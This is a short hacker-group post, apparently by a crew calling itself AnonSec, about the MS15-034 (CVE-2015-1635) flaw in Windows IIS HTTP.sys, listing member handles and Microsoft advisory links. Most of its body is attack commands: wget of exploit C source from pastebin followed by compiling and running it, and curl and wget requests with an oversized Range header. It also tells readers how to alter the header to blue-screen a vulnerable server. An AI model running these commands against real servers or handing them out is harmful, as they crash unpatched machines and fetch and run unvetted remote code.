We are...
                      _____                         _________              
                     /  _  \   ____   ____   ____  /   _____/ ____   ____  
                    /  /_\  \ /    \ /  _ \ /    \ \_____  \_/ __ \_/ ___\
                   /    |    \   |  (  <_> )   |  \/        \  ___/\  \___
                   \____|__  /___|  /\____/|___|  /_______  /\___  >\___  >
                           \/     \/            \/        \/     \/     \/
                                    //Laughing at your security since 2012*
=================================================================================================
Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - MS08-067 - Hannaichi - ap3x h4x0r - 
        Gh05tFr3ak - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList - AN0NT0XIC - Ny0g3n
=================================================================================================

(CVE-2015-1635) Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, 
and Windows Server 2012 R2 systems running Microsoft's IIS web server are affected. The component 
at fault is HTTP.sys, a kernel-level driver that forwards requests for webpages and the like to 
the user-space server software, and caches static files.


Microsoft Window - HTTP.sys PoC (MS15-034)
http://www.exploit-db.com/exploits/36773/

wget http://pastebin.com/raw.php?i=ypURDPc4 -O HTTPsys.c
gcc HTTPsys.c -o HTTPsys
./HTTPsys 



To check if vuln/exploit using curl:
curl -v [ipaddress]/static.png -H "Host: test" -H "Range: bytes=0-18446744073709551615"

Change 0- to 20- to blue-screen-of-death a vulnerable box.


With Wget:
wget -O /dev/null --header="Range: 0-18446744073709551615" http://[ip address]/



[+] Sources [+]
https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
https://support.microsoft.com/en-us/kb/3042553
http://www.theregister.co.uk/2015/04/16/http_sys_exploit_wild_ms15_034/
http://www.exploit-db.com/exploits/36773/
Twitter: @rhcp011235